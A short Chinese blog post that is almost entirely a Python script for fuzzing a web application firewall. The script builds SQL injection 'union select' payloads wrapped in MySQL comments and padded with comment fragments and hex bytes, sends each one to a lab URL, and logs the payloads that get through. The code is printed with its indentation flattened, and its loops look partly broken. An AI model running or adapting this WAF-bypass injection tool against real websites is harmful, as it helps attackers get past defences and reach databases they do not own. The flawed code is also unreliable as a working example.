Ca1s1'Blog

Bypass Waf Script

字数统计: 248阅读时长: 1 min
2020/06/18 Share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#encoding=utf-8

import requests
import random

url = "http://192.168.235.133/2.php?a=1"
Fuzz_a = ['/*!14450','*/','/**/','/','-','+']
#Fuzz_a = ['']
Fuzz_b = ['']
#Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
Fuzz_c = []
for line in open('HexValsAllBytes.txt','r').readlines():
Fuzz_c.append(line.strip('\n'))

FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
#配置fuzz字典
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
#设置请求的headers
for a in FUZZ:
pass
for b in FUZZ:
pass
for c in FUZZ:
for d in FUZZ:
pass
for e in FUZZ:
pass

PYLOAD = "/*!uNion"+a+b+c+d+e+"seLect*/1,3333"
urlp = url+PYLOAD
#print(urlp)
res = requests.get(urlp,headers=header)
#print(res.text)
#使用for排列组合fuzz字典并请求页面
if '1xiaobai13333' in res.text: #这个flag需要改,根据你测的正常页面中,有什么字段是必然出现的
print ("[*]URL:"+ urlp +"BYPASS!")
f=open('result.txt','a')
f.write(urlp+"\n")
f.close

原文作者:Fidcer

原文链接:https://vuln.top/2020/06/18/bypass/

发表日期:June 18th 2020, 2:04:16 pm

更新日期:June 18th 2020, 2:04:16 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG